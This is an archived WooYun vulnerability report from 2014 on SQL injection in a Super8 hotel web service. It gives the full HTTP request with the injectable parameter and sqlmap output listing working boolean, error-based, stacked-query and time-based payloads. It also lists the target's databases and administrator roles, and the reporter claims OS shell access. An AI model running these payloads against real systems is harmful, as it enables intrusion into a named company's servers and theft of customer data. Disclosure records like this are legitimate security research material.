乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-13: 细节已通知厂商并且等待厂商处理中 2014-02-23: 厂商已经主动忽略漏洞,细节向公众公开
sql注入
http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfo存在sql注入
POST /mobileInterface/Super8Interface.asmx/getCustInfo HTTP/1.1Host: www0.super8.com.cnProxy-Connection: keep-aliveContent-Length: 19Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www0.super8.com.cnUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfoAccept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4Cookie: _ga=GA1.3.576428575.1392259674; __ozlvd1031=1392266610; Hm_lvt_f9811dfd07fecd5f46d92b0f29d344e7=1392259675; Hm_lpvt_f9811dfd07fecd5f46d92b0f29d344e7=1392266611; arp_scroll_position=634cardNo=300976300%27
SQL注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: cardNo Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cardNo=300976300' AND 1257=1257-- ODsg Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cardNo=300976300' AND 3358=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3358=3358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(99)+CHAR(113)))-- tqxg Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cardNo=300976300'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cardNo=300976300' WAITFOR DELAY '0:0:5'-----[16:09:35] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008
可获得os-shell
浏览了一下
和 WooYun: 速8酒店某处泄漏大量用户资料及订单信息 是同一个页面。
dbs
available databases [16]:[*] bidata[*] crs_report[*] distribution[*] importcard20130412[*] ipegasus3[*] ipegasus_history[*] ipegasus_mirro[*] ipegasus_report[*] iPegasusWeb[*] master[*] model[*] msdb[*] tempcard[*] tempcard2[*] tempcard3[*] tempdb
roles
database management system users roles:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] bi (administrator)[*] crs[*] crs2[*] distributor_admin (administrator)[*] pms[*] sa (administrator)[*] super8admin (administrator)[*] super8web (administrator)[*] super8webadmin (administrator)
os-shell
浏览
不知道干啥的
没拖库,下文件,cookie都贴出来了,天地良心。
检查
危害等级:无影响厂商忽略
忽略时间:2014-02-23 16:33
漏洞Rank:12 (WooYun评价)
暂无